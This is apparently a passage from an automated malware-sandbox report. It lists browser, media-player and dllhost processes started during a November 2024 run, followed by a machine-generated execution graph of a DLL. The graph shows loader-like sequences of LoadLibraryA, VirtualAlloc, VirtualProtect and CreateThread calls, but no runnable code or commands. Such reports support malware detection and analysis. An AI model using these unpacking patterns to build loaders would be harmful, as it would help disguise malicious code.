Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2376,i,16818295695986717264,7118115118329945779,262144 /prefetch:8
Imagebase:0x7ff6b2cb0000
File size:3'242'272 bytes
MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:05:27:20
Start date:21/11/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6BC.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/32916e99"
Imagebase:0x7ff6d8030000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:05:27:21
Start date:21/11/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2100,i,4541570122865520646,14461282582081406380,262144 /prefetch:3
Imagebase:0x7ff6d8030000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:05:27:38
Start date:21/11/2024
Path:C:\Program Files\Windows Media Player\wmplayer.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Windows Media Player\wmplayer.exe"
Imagebase:0x7ff7839a0000
File size:171'008 bytes
MD5 hash:89DCD2D4C0EC638AADC00D3530E07E1D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:43
Start time:05:27:41
Start date:21/11/2024
Path:C:\Windows\System32\dllhost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\dllhost.exe"
Imagebase:0x7ff733cd0000
File size:21'312 bytes
MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false


Execution Graph

Execution Coverage:4.5%
Dynamic/Decrypted Code Coverage:7%
Signature Coverage:4%
Total number of Nodes:1047
Total number of Limit Nodes:80
calls __DllMainCRTStartup@12 36065->36117 36067 6c8bf545 __DllMainCRTStartup@12 36067->36068 36069 6c8bf647 __DllMainCRTStartup@12 36067->36069 36116 6c8b72e0 34 API calls __DllMainCRTStartup@12 36068->36116 36070 6c8bf6ac 36069->36070 36118 6c8ba760 36069->36118 36079 6c8bf867 __DllMainCRTStartup@12 36070->36079 36128 6c8b6b20 HeapFree __DllMainCRTStartup@12 36070->36128 36073 6c8bf765 __DllMainCRTStartup@12 36074 6c8bf799 36073->36074 36076 6c8bf811 __DllMainCRTStartup@12 36073->36076 36125 6c8b6b20 HeapFree __DllMainCRTStartup@12 36074->36125 36126 6c8b6b20 HeapFree __DllMainCRTStartup@12 36076->36126 36078 6c8bf87f 36127 6c8b6d10 HeapFree __DllMainCRTStartup@12 36078->36127 36129 6c8c0580 45 API calls __DllMainCRTStartup@12 36079->36129 36082 6c8bf970 __DllMainCRTStartup@12 36083 6c8bfa47 __DllMainCRTStartup@12 36082->36083 36086 6c8bf9a9 __DllMainCRTStartup@12 36082->36086 36136 6c8b7110 34 API calls __DllMainCRTStartup@12 36083->36136 36085 6c8bfd55 36137 6c8b6d10 HeapFree __DllMainCRTStartup@12 36085->36137 36087 6c8ba760 __DllMainCRTStartup@12 59 API calls 36086->36087 36091 6c8bfacf __DllMainCRTStartup@12 36087->36091 36089 6c8bfd6d 36138 6c8b72e0 34 API calls __DllMainCRTStartup@12 36089->36138 36092 6c8bfb03 __DllMainCRTStartup@12 36091->36092 36093 6c8bfb65 __DllMainCRTStartup@12 36091->36093 36130 6c8b6d10 HeapFree __DllMainCRTStartup@12 36092->36130 36132 6c8b72d0 HeapFree __DllMainCRTStartup@12 36093->36132 36095 6c8bfcf6 36133 6c8b7110 34 API calls __DllMainCRTStartup@12 36095->36133 36097 6c8bfcae 36131 6c8b72e0 34 API calls __DllMainCRTStartup@12 36097->36131 36099 6c8bfd0e 36134 6c8b6d10 HeapFree __DllMainCRTStartup@12 36099->36134 36102 6c8bfd26 36135 6c8b72e0 34 API calls __DllMainCRTStartup@12 36102->36135 36139 6c8b9960 36104->36139 36107 6c8bb970 36108 6c8bb9d1 __DllMainCRTStartup@12 36107->36108 36109 6c8bb9f1 36108->36109 36165 6c904ec0 WaitOnAddress GetLastError 36108->36165 36162 6c8bba20 36109->36162 36112 6c8bba13 36112->36058 36113 
6c9058e0 33 API calls __DllMainCRTStartup@12 36112->36113 36114->36062 36115->36065 36116->36059 36117->36067 36171 6c8b2340 36118->36171 36124 6c8ba7d4 36124->36073 36125->36070 36126->36078 36127->36070 36128->36079 36129->36082 36130->36097 36131->36059 36132->36095 36133->36099 36134->36102 36135->36059 36136->36085 36137->36089 36138->36059 36142 6c8b9a10 36139->36142 36145 6c8b9a90 36142->36145 36155 6c8b9bc0 36145->36155 36149 6c8b9b2e __DllMainCRTStartup@12 36150 6c8b9b4f 36149->36150 36151 6c8b9b6e 36149->36151 36160 6c9056a0 33 API calls __DllMainCRTStartup@12 36150->36160 36161 6c8b9a80 33 API calls __DllMainCRTStartup@12 36151->36161 36154 6c8b880d 36154->36107 36156 6c8b9bd3 __DllMainCRTStartup@12 36155->36156 36157 6c8b9ae3 36156->36157 36158 6c8b9a80 __DllMainCRTStartup@12 33 API calls 36156->36158 36157->36154 36159 6c8b96e0 35 API calls __DllMainCRTStartup@12 36157->36159 36158->36157 36159->36149 36161->36154 36166 6c8af2e0 36162->36166 36164 6c8bba43 __DllMainCRTStartup@12 36164->36112 36165->36109 36167 6c8af31e __DllMainCRTStartup@12 36166->36167 36169 6c8af328 __DllMainCRTStartup@12 36167->36169 36170 6c904c50 33 API calls __DllMainCRTStartup@12 36167->36170 36169->36164 36170->36169 36187 6c8c2880 36171->36187 36173 6c8b234f __DllMainCRTStartup@12 36190 6c8c57c0 36173->36190 36176 6c8bedb0 36177 6c8bee02 __DllMainCRTStartup@12 36176->36177 36212 6c8bb8c0 33 API calls __DllMainCRTStartup@12 36177->36212 36179 6c8bee11 36181 6c8bee54 __DllMainCRTStartup@12 36179->36181 36218 6c9058e0 33 API calls __DllMainCRTStartup@12 36179->36218 36213 6c8b9c00 36181->36213 36183 6c8beea2 __DllMainCRTStartup@12 36219 6c8b62e0 34 API calls __DllMainCRTStartup@12 36183->36219 36185 6c8ba7b0 36186 6c8b7d70 35 API calls __DllMainCRTStartup@12 36185->36186 36186->36124 36196 6c8b79c0 36187->36196 36191 6c8c5846 36190->36191 36195 6c8b2371 36190->36195 36210 6c8af6f0 33 API calls __DllMainCRTStartup@12 36191->36210 36194 6c8c5883 36194->36195 36211 6c8b2380 33 API 
calls __DllMainCRTStartup@12 36194->36211 36195->36176 36203 6c8b0630 36196->36203 36200 6c8b7a8b 36200->36173 36202 6c8b7a20 36202->36200 36208 6c9056f0 33 API calls __DllMainCRTStartup@12 36202->36208 36204 6c8b064c 36203->36204 36205 6c8b0653 36203->36205 36204->36202 36209 6c905be0 33 API calls __DllMainCRTStartup@12 36204->36209 36205->36204 36206 6c9055d0 __DllMainCRTStartup@12 33 API calls 36205->36206 36207 6c8b0715 36206->36207 36210->36194 36211->36194 36212->36179 36220 6c8ba0d0 36 API calls __DllMainCRTStartup@12 36213->36220 36215 6c8b9c8f 36221 6c8b8360 36215->36221 36217 6c8b9ccb 36217->36183 36219->36185 36220->36215 36222 6c8b83ce 36221->36222 36223 6c8b8394 __DllMainCRTStartup@12 36221->36223 36225 6c8b9ce0 36222->36225 36223->36217 36226 6c8ba310 __DllMainCRTStartup@12 56 API calls 36225->36226 36227 6c8b9d67 36226->36227 36228 6c8b81f0 __DllMainCRTStartup@12 36 API calls 36227->36228 36229 6c8b9d95 36228->36229 36230 6c8b68a0 __DllMainCRTStartup@12 HeapFree 36229->36230 36231 6c8b9daa 36230->36231 36231->36223 36233 6c8ac4af 36232->36233 36234 6c8ac512 36232->36234 36249 6c8a7bc0 33 API calls __DllMainCRTStartup@12 36233->36249 36235 6c8ac51a 36234->36235 36236 6c8ac572 36234->36236 36254 6c8ac3d0 33 API calls __DllMainCRTStartup@12 36235->36254 36255 6c8ac7b0 RtlAllocateHeap GetProcessHeap HeapAlloc __DllMainCRTStartup@12 36236->36255 36238 6c8ac4bb 36250 6c8a8630 36238->36250 36242 6c8ac376 36242->36047 36248 6c905470 33 API calls __DllMainCRTStartup@12 36242->36248 36243 6c8ac56c 36243->36242 36244 6c8a8630 __DllMainCRTStartup@12 33 API calls 36243->36244 36245 6c8ac60f 36244->36245 36246 6c8a8630 __DllMainCRTStartup@12 33 API calls 36245->36246 36247 6c8ac6ba 36246->36247 36249->36238 36251 6c8a8640 36250->36251 36252 6c8a8654 36250->36252 36256 6c9056f0 33 API calls __DllMainCRTStartup@12 36251->36256 36252->36242 36254->36243 36255->36243 36257 6c8c77e0 36260 6c8c6420 36257->36260 36261 6c8c6483 __DllMainCRTStartup@12 36260->36261 36262 
6c904f70 __DllMainCRTStartup@12 37 API calls 36261->36262 36263 6c8c64ce 36261->36263 36262->36263 36264 2646869 36265 2646977 36264->36265 36266 264688d 36264->36266 36276 2647b43 36265->36276 36303 26490ea 36266->36303 36269 26468a5 36270 26490ea LoadLibraryA 36269->36270 36275 264691d 36269->36275 36271 26468e7 36270->36271 36272 26490ea LoadLibraryA 36271->36272 36273 2646903 36272->36273 36274 26490ea LoadLibraryA 36273->36274 36274->36275 36277 26490ea LoadLibraryA 36276->36277 36278 2647b66 36277->36278 36279 26490ea LoadLibraryA 36278->36279 36280 2647b7e 36279->36280 36281 26490ea LoadLibraryA 36280->36281 36282 2647b9c 36281->36282 36283 2647bb1 VirtualAlloc 36282->36283 36292 2647bc5 36282->36292 36285 2647bdf 36283->36285 36283->36292 36284 26490ea LoadLibraryA 36286 2647c5d 36284->36286 36285->36284 36299 2647e41 36285->36299 36289 2647cb3 36286->36289 36286->36292 36307 2648ef1 36286->36307 36287 26490ea LoadLibraryA 36287->36289 36289->36287 36291 2647d15 36289->36291 36289->36299 36290 2647ef6 VirtualFree 36290->36292 36291->36299 36302 2647d77 36291->36302 36311 2646cd3 36291->36311 36292->36275 36294 2647e83 36342 2648273 LoadLibraryA 36294->36342 36296 2647e38 36296->36299 36334 2647934 36296->36334 36299->36290 36301 2647e95 36299->36301 36301->36301 36302->36294 36302->36296 36302->36299 36304 2649101 36303->36304 36305 2649128 36304->36305 36348 26471ef LoadLibraryA 36304->36348 36305->36269 36309 2648f06 36307->36309 36308 2648f7c LoadLibraryA 36310 2648f86 36308->36310 36309->36308 36309->36310 36310->36286 36312 2648ef1 LoadLibraryA 36311->36312 36313 2646ce7 36312->36313 36314 2646cef 36313->36314 36343 2648f8f 36313->36343 36314->36299 36325 2646dce 36314->36325 36317 2646d25 VirtualProtect 36317->36314 36318 2646d39 36317->36318 36319 2646d53 VirtualProtect 36318->36319 36320 2648f8f LoadLibraryA 36319->36320 36321 2646d74 36320->36321 36321->36314 36322 2646d8b VirtualProtect 36321->36322 36322->36314 36323 2646d9b 36322->36323 36324 
2646db0 VirtualProtect 36323->36324 36324->36314 36326 2648ef1 LoadLibraryA 36325->36326 36327 2646de4 36326->36327 36328 2648f8f LoadLibraryA 36327->36328 36329 2646df4 36328->36329 36330 2646e31 36329->36330 36331 2646dfd VirtualProtect 36329->36331 36330->36302 36331->36330 36332 2646e0d 36331->36332 36333 2646e1c VirtualProtect 36332->36333 36333->36330 36336 2647967 36334->36336 36335 2647a12 36335->36299 36336->36335 36337 2647a59 SysAllocString 36336->36337 36338 2647a41 36336->36338 36337->36338 36338->36335 36339 2647aad SafeArrayCreate 36338->36339 36339->36335 36341 2647ad1 36339->36341 36340 2647b2d SafeArrayDestroy 36340->36335 36341->36340 36341->36341 36342->36299 36344 2646d07 36343->36344 36345 2648faa 36343->36345 36344->36314 36344->36317 36345->36344 36347 2647394 LoadLibraryA 36345->36347 36347->36344 36348->36304 36349 6c8fbdbf 36350 6c8fbdc8 36349->36350 36354 6c8fbdfa 36349->36354 36355 6c8fa9fb 36350->36355 36356 6c8faa06 36355->36356 36359 6c8faa0c 36355->36359 36403 6c8f8afd 6 API calls __dosmaperr 36356->36403 36360 6c8faa12 36359->36360 36404 6c8f8b3c 36359->36404 36363 6c8faa17 36360->36363 36412 6c8f8364 41 API calls CallUnexpected 36360->36412 36380 6c8fbbca 36363->36380 36364 6c8f87eb __dosmaperr 14 API calls 36366 6c8faa36 36364->36366 36367 6c8faa3e 36366->36367 36368 6c8faa53 36366->36368 36369 6c8f8b3c __dosmaperr 6 API calls 36367->36369 36370 6c8f8b3c __dosmaperr 6 API calls 36368->36370 36371 6c8faa4a 36369->36371 36372 6c8faa5f 36370->36372 36409 6c8f8848 14 API calls __dosmaperr 36371->36409 36373 6c8faa63 36372->36373 36374 6c8faa72 36372->36374 36376 6c8f8b3c __dosmaperr 6 API calls 36373->36376 36410 6c8fa742 14 API calls __dosmaperr 36374->36410 36376->36371 36378 6c8faa7d 36411 6c8f8848 14 API calls __dosmaperr 36378->36411 36421 6c8fbd1f 36380->36421 36387 6c8fbc26 36459 6c8f8848 14 API calls __dosmaperr 36387->36459 36388 6c8fbc34 36448 6c8fbe1a 36388->36448 36392 6c8fbc0d 36392->36354 36393 6c8fbc6c 36460 6c8f87d8 
14 API calls __dosmaperr 36393->36460 36395 6c8fbc71 36461 6c8f8848 14 API calls __dosmaperr 36395->36461 36396 6c8fbcb3 36397 6c8fbcfc 36396->36397 36463 6c8fb843 41 API calls 2 library calls 36396->36463 36464 6c8f8848 14 API calls __dosmaperr 36397->36464 36399 6c8fbc87 36399->36396 36462 6c8f8848 14 API calls __dosmaperr 36399->36462 36403->36359 36413 6c8f899b 36404->36413 36407 6c8f8b76 TlsSetValue 36408 6c8f8b61 36408->36360 36408->36364 36409->36360 36410->36378 36411->36363 36414 6c8f89cb 36413->36414 36418 6c8f89c7 36413->36418 36414->36418 36420 6c8f88d0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_FlsGetValue 36414->36420 36416 6c8f89df 36417 6c8f89e5 GetProcAddress 36416->36417 36416->36418 36417->36418 36419 6c8f89f5 __dosmaperr 36417->36419 36418->36407 36418->36408 36419->36418 36420->36416 36422 6c8fbd2b ___scrt_is_nonwritable_in_current_image 36421->36422 36424 6c8fbd45 36422->36424 36465 6c8fad0c EnterCriticalSection 36422->36465 36425 6c8fbbf4 36424->36425 36468 6c8f8364 41 API calls CallUnexpected 36424->36468 36432 6c8fb951 36425->36432 36426 6c8fbd81 36467 6c8fbd9e LeaveCriticalSection CallUnexpected 36426->36467 36430 6c8fbd55 36430->36426 36466 6c8f8848 14 API calls __dosmaperr 36430->36466 36469 6c8fb417 36432->36469 36435 6c8fb984 36437 6c8fb99b 36435->36437 36438 6c8fb989 GetACP 36435->36438 36436 6c8fb972 GetOEMCP 36436->36437 36437->36392 36439 6c8f93ef 36437->36439 36438->36437 36440 6c8f942d 36439->36440 36441 6c8f93fd 36439->36441 36481 6c8f87d8 14 API calls __dosmaperr 36440->36481 36442 6c8f9418 HeapAlloc 36441->36442 36446 6c8f9401 __dosmaperr 36441->36446 36444 6c8f942b 36442->36444 36442->36446 36445 6c8f9432 36444->36445 36445->36387 36445->36388 36446->36440 36446->36442 36480 6c8fc504 EnterCriticalSection LeaveCriticalSection __dosmaperr 36446->36480 36449 6c8fb951 43 API calls 36448->36449 36450 6c8fbe3a 36449->36450 36451 6c8fbf3f 36450->36451 36453 6c8fbe77 IsValidCodePage 36450->36453 36458 6c8fbe92 
CallUnexpected 36450->36458 36493 6c8f0c5b 36451->36493 36453->36451 36455 6c8fbe89 36453->36455 36454 6c8fbc61 36454->36393 36454->36399 36456 6c8fbeb2 GetCPInfo 36455->36456 36455->36458 36456->36451 36456->36458 36482 6c8fba25 36458->36482 36459->36392 36460->36395 36461->36392 36462->36396 36463->36397 36464->36392 36465->36430 36466->36426 36467->36424 36470 6c8fb435 36469->36470 36476 6c8fb42e 36469->36476 36470->36476 36477 6c8fa940 41 API calls 3 library calls 36470->36477 36472 6c8fb456 36478 6c8f970f 41 API calls _fread 36472->36478 36474 6c8fb46c 36479 6c8f976d 41 API calls _fread 36474->36479 36476->36435 36476->36436 36477->36472 36478->36474 36479->36476 36480->36446 36481->36445 36483 6c8fba4d GetCPInfo 36482->36483 36492 6c8fbb16 36482->36492 36488 6c8fba65 36483->36488 36483->36492 36484 6c8f0c5b CatchGuardHandler 5 API calls 36486 6c8fbbc8 36484->36486 36486->36451 36500 6c90089e 36488->36500 36491 6c901243 46 API calls 36491->36492 36492->36484 36494 6c8f0c64 IsProcessorFeaturePresent 36493->36494 36495 6c8f0c63 36493->36495 36497 6c8f1335 36494->36497 36495->36454 36571 6c8f12f8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 36497->36571 36499 6c8f1418 36499->36454 36501 6c8fb417 41 API calls 36500->36501 36502 6c9008be 36501->36502 36520 6c8fc1bc 36502->36520 36504 6c9008eb 36505 6c900972 36504->36505 36507 6c8f93ef _fread 15 API calls 36504->36507 36510 6c90097a 36504->36510 36511 6c900910 CallUnexpected 36504->36511 36523 6c90099f 14 API calls __freea 36505->36523 36506 6c8f0c5b CatchGuardHandler 5 API calls 36508 6c8fbacd 36506->36508 36507->36511 36515 6c901243 36508->36515 36510->36506 36511->36505 36512 6c8fc1bc ___scrt_uninitialize_crt MultiByteToWideChar 36511->36512 36513 6c900959 36512->36513 36513->36505 36514 6c900960 GetStringTypeW 36513->36514 36514->36505 36516 6c8fb417 41 API calls 36515->36516 36517 6c901256 36516->36517 36526 6c901054 36517->36526 36524 6c8fc124 36520->36524 
36523->36510 36525 6c8fc135 MultiByteToWideChar 36524->36525 36525->36504 36527 6c90106f 36526->36527 36528 6c8fc1bc ___scrt_uninitialize_crt MultiByteToWideChar 36527->36528 36531 6c9010b3 36528->36531 36529 6c90122e 36530 6c8f0c5b CatchGuardHandler 5 API calls 36529->36530 36532 6c8fbaee 36530->36532 36531->36529 36533 6c8f93ef _fread 15 API calls 36531->36533 36535 6c9010d9 36531->36535 36546 6c901181 36531->36546 36532->36491 36533->36535 36536 6c8fc1bc ___scrt_uninitialize_crt MultiByteToWideChar 36535->36536 36535->36546 36537 6c901122 36536->36537 36537->36546 36554 6c8f8bc9 36537->36554 36540 6c901190 36542 6c901219 36540->36542 36543 6c8f93ef _fread 15 API calls 36540->36543 36547 6c9011a2 36540->36547 36541 6c901158 36545 6c8f8bc9 7 API calls 36541->36545 36541->36546 36565 6c90099f 14 API calls __freea 36542->36565 36543->36547 36545->36546 36566 6c90099f 14 API calls __freea 36546->36566 36547->36542 36548 6c8f8bc9 7 API calls 36547->36548 36549 6c9011e5 36548->36549 36549->36542 36563 6c8fc276 WideCharToMultiByte _fread 36549->36563 36551 6c9011ff 36551->36542 36552 6c901208 36551->36552 36564 6c90099f 14 API calls __freea 36552->36564 36567 6c8f889c 36554->36567 36557 6c8f8bda LCMapStringEx 36562 6c8f8c21 36557->36562 36558 6c8f8c01 36570 6c8f8c26 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 36558->36570 36561 6c8f8c1a LCMapStringW 36561->36562 36562->36540 36562->36541 36562->36546 36563->36551 36564->36546 36565->36546 36566->36529 36568 6c8f899b __dosmaperr 5 API calls 36567->36568 36569 6c8f88b2 36568->36569 36569->36557 36569->36558 36570->36561 36571->36499 36572 6c8ab890 36575 6c8aa060 36572->36575 36578 6c8a5700 36575->36578 36581 6c8a58e0 36578->36581 36584 6c8a7ea0 36581->36584 36593 6c8a11b0 36584->36593 36590 6c8a7f17 36592 6c8a7f56 36590->36592 36608 6c9058e0 33 API calls __DllMainCRTStartup@12 36590->36608 36609 6c8a1000 36593->36609 36596 6c8d4280 36597 6c8d4296 36596->36597 36598 6c8d42a0 CreateWaitableTimerExW 
36596->36598 36597->36598 36599 6c8d4341 36597->36599 36598->36599 36600 6c8d42b9 36598->36600 36601 6c8d4398 Sleep 36599->36601 36604 6c8d4335 36599->36604 36602 6c8d4337 CloseHandle 36600->36602 36605 6c8d42f5 SetWaitableTimer 36600->36605 36603 6c8a7efa 36601->36603 36602->36599 36607 6c8a1a70 57 API calls 36603->36607 36604->36599 36604->36601 36605->36602 36606 6c8d431b WaitForSingleObject CloseHandle 36605->36606 36606->36603 36606->36604 36607->36590 36610 6c8a1031 36609->36610 36611 6c8a1093 36609->36611 36610->36611 36613 6c9055d0 33 API calls __DllMainCRTStartup@12 36610->36613 36611->36596 36635 6c8ab8b0 36638 6c8aa070 36635->36638 36641 6c8a56e0 36638->36641 36644 6c8a58d0 36641->36644 36647 6c8a7f90 36644->36647 36664 6c8a9ed0 36647->36664 36650 6c8a802e __DllMainCRTStartup@12 36652 6c8a8081 VirtualAlloc 36650->36652 36653 6c8a80b4 __DllMainCRTStartup@12 36652->36653 36668 6c8abd40 33 API calls __DllMainCRTStartup@12 36653->36668 36655 6c8a8113 __InternalCxxFrameHandler 36669 6c8a2dd0 36655->36669 36659 6c8a815a 36663 6c8a81bd 36659->36663 36676 6c9058e0 33 API calls __DllMainCRTStartup@12 36659->36676 36661 6c8a11b0 33 API calls 36661->36663 36662 6c8d4280 6 API calls 36662->36663 36663->36661 36663->36662 36665 6c8a9f28 36664->36665 36677 6c8d4c10 36665->36677 36668->36655 36820 6c8a3040 36669->36820 36673 6c8a2e5a 36675 6c8a2d10 38 API calls 36673->36675 36674 6c9058e0 33 API calls __DllMainCRTStartup@12 36675->36659 36695 6c8dc180 36677->36695 36680 6c8a7fdf 36680->36650 36680->36674 36683 6c8d4d49 36686 6c8d4d20 36683->36686 36715 6c8d3b20 36683->36715 36684 6c8d4cd8 36684->36686 36689 6c8d4d10 36684->36689 36725 6c8ac770 HeapFree 36684->36725 36688 6c8d4d8d CloseHandle 36686->36688 36723 6c8d6010 36686->36723 36688->36680 36726 6c8ac770 HeapFree 36689->36726 36727 6c8de260 36695->36727 36699 6c8d4c96 36699->36680 36710 6c8dc3a0 GetFileInformationByHandle 36699->36710 36701 6c8dc2bd CreateFileW 36703 6c8dc2f3 36701->36703 36704 6c8dc352 
GetLastError 36701->36704 36705 6c8dc304 GetLastError 36703->36705 36707 6c8dc220 36703->36707 36704->36699 36704->36707 36706 6c8dc315 SetFileInformationByHandle 36705->36706 36705->36707 36706->36707 36708 6c8dc380 GetLastError CloseHandle 36706->36708 36707->36699 36788 6c8ac770 HeapFree 36707->36788 36708->36707 36709 6c8dc397 36708->36709 36709->36699 36711 6c8dc46b GetLastError 36710->36711 36712 6c8dc3d5 36710->36712 36713 6c8d4cc2 36711->36713 36712->36713 36714 6c8dc3e2 GetFileInformationByHandleEx 36712->36714 36713->36683 36713->36684 36714->36711 36714->36713 36716 6c8d3b5a 36715->36716 36717 6c8d3b24 36715->36717 36716->36686 36718 6c8d3b4f 36717->36718 36719 6c8d3b69 36717->36719 36720 6c8d3b41 36717->36720 36718->36686 36719->36718 36721 6c8ac760 __DllMainCRTStartup@12 3 API calls 36719->36721 36818 6c8ac790 5 API calls __DllMainCRTStartup@12 36720->36818 36721->36718 36819 6c8d603b 38 API calls __DllMainCRTStartup@12 36723->36819 36725->36689 36726->36686 36728 6c8de29f 36727->36728 36729 6c8de2cb 36727->36729 36731 6c8de3cf 36728->36731 36732 6c8de2ae 36728->36732 36797 6c8d3ef0 33 API calls 36729->36797 36800 6c905450 33 API calls __DllMainCRTStartup@12 36731->36800 36789 6c8ac760 36732->36789 36735 6c8de2c0 36735->36729 36736 6c8de3d8 36735->36736 36801 6c905450 33 API calls __DllMainCRTStartup@12 36736->36801 36739 6c8de360 36740 6c8dc19a 36739->36740 36798 6c8ac770 HeapFree 36739->36798 36740->36699 36747 6c8de970 36740->36747 36741 6c8de38b 36741->36740 36799 6c8d3c40 35 API calls __DllMainCRTStartup@12 36741->36799 36746 6c8de2f8 36746->36739 36746->36741 36749 6c8de9ab 36747->36749 36748 6c8deadd SetLastError GetFullPathNameW 36748->36749 36750 6c8deaf6 GetLastError 36748->36750 36749->36748 36751 6c8deb16 GetLastError 36749->36751 36755 6c8deb42 36749->36755 36765 6c8dc1cc 36749->36765 36807 6c9048c0 33 API calls __DllMainCRTStartup@12 36749->36807 36750->36749 36753 6c8deb84 GetLastError 36750->36753 36751->36749 36754 6c8deeb1 
36751->36754 36756 6c8deba0 36753->36756 36757 6c8deb93 36753->36757 36814 6c9056a0 33 API calls __DllMainCRTStartup@12 36754->36814 36758 6c8deb4d 36755->36758 36759 6c8deece 36755->36759 36756->36765 36809 6c8ac770 HeapFree 36756->36809 36808 6c8ac770 HeapFree 36757->36808 36771 6c8dec4b 36758->36771 36778 6c8deb60 36758->36778 36815 6c905970 33 API calls __DllMainCRTStartup@12 36759->36815 36765->36699 36765->36701 36765->36707 36767 6c8ded0e __DllMainCRTStartup@12 36779 6c8deda6 __DllMainCRTStartup@12 36767->36779 36811 6c9048c0 33 API calls __DllMainCRTStartup@12 36767->36811 36771->36767 36774 6c8d3b20 5 API calls 36771->36774 36772 6c8ded03 36772->36767 36810 6c9048c0 33 API calls __DllMainCRTStartup@12 36772->36810 36775 6c8dee82 36774->36775 36775->36767 36776 6c8deeff 36775->36776 36817 6c905450 33 API calls __DllMainCRTStartup@12 36776->36817 36778->36772 36780 6c8d3b20 5 API calls 36778->36780 36782 6c8deded 36779->36782 36812 6c8d3c40 35 API calls __DllMainCRTStartup@12 36779->36812 36783 6c8ded22 36780->36783 36782->36765 36813 6c8ac770 HeapFree 36782->36813 36783->36772 36786 6c8deee6 36783->36786 36816 6c905450 33 API calls __DllMainCRTStartup@12 36786->36816 36788->36699 36790 6c8da0b0 36789->36790 36791 6c8da0d9 36790->36791 36792 6c8da0c2 36790->36792 36793 6c8dc150 __DllMainCRTStartup@12 3 API calls 36791->36793 36802 6c8dc150 36792->36802 36796 6c8da0ec 36793->36796 36795 6c8da0d3 36795->36735 36796->36735 36797->36746 36798->36740 36799->36740 36803 6c8dc16d 36802->36803 36804 6c8dc162 RtlAllocateHeap 36802->36804 36805 6c904d50 __DllMainCRTStartup@12 GetProcessHeap HeapAlloc 36803->36805 36804->36795 36806 6c8dc172 36805->36806 36806->36795 36808->36756 36809->36765 36812->36782 36813->36765 36818->36718 36824 6c8a32d0 36820->36824 36823 6c8a2030 33 API calls __DllMainCRTStartup@12 36823->36673 36825 6c8a3393 36824->36825 36827 6c8a339f 36824->36827 36873 6c8a5dd0 40 API calls 36825->36873 36833 6c8a3405 36827->36833 36874 6c8ac000 35 API 
calls __DllMainCRTStartup@12 36827->36874 36830 6c8a3459 36875 6c8a2130 33 API calls __DllMainCRTStartup@12 36830->36875 36832 6c8a3473 36834 6c8ac330 __DllMainCRTStartup@12 33 API calls 36832->36834 36854 6c8d4490 36833->36854 36835 6c8a35cb 36834->36835 36836 6c8d5be0 33 API calls 36835->36836 36839 6c8a3680 36836->36839 36837 6c8d5be0 33 API calls 36838 6c8a36f9 36837->36838 36840 6c8a5e70 HeapFree 36838->36840 36839->36837 36841 6c8a372a 36840->36841 36842 6c8a380f 36841->36842 36876 6c8d4060 35 API calls __DllMainCRTStartup@12 36841->36876 36844 6c8ac330 __DllMainCRTStartup@12 33 API calls 36842->36844 36845 6c8a3856 36844->36845 36846 6c8a8630 __DllMainCRTStartup@12 33 API calls 36845->36846 36847 6c8a38bd 36846->36847 36858 6c8dd570 36847->36858 36851 6c8a3a2c 36878 6c8ca0f0 33 API calls __DllMainCRTStartup@12 36851->36878 36853 6c8a2e2e 36853->36823 36855 6c8d449d 36854->36855 36879 6c8d44d0 36855->36879 36859 6c8ac760 __DllMainCRTStartup@12 3 API calls 36858->36859 36860 6c8dd5b0 36859->36860 36861 6c8dd5bb CreateThread 36860->36861 36862 6c8dd652 36860->36862 36864 6c8a3934 36861->36864 36867 6c8dd5ed 36861->36867 36898 6c8dd6d0 SetThreadStackGuarantee 36861->36898 36897 6c905470 33 API calls __DllMainCRTStartup@12 36862->36897 36864->36853 36877 6c8a6a50 34 API calls 36864->36877 36869 6c8dd621 36867->36869 36895 6c8ac770 HeapFree 36867->36895 36896 6c8ac770 HeapFree 36869->36896 36872 6c8dd630 GetLastError 36872->36864 36873->36827 36874->36830 36875->36833 36876->36842 36877->36851 36878->36853 36892 6c8e8070 33 API calls 2 library calls 36879->36892 36881 6c8d4514 36882 6c8d4531 36881->36882 36885 6c8ac760 __DllMainCRTStartup@12 3 API calls 36881->36885 36883 6c8d453c 36882->36883 36884 6c8d45bf 36882->36884 36888 6c8d44be 36883->36888 36894 6c9049d0 33 API calls __DllMainCRTStartup@12 36883->36894 36893 6c905470 33 API calls __DllMainCRTStartup@12 36884->36893 36885->36882 36888->36832 36892->36881 36895->36869 36896->36872 36899 6c8dd727 
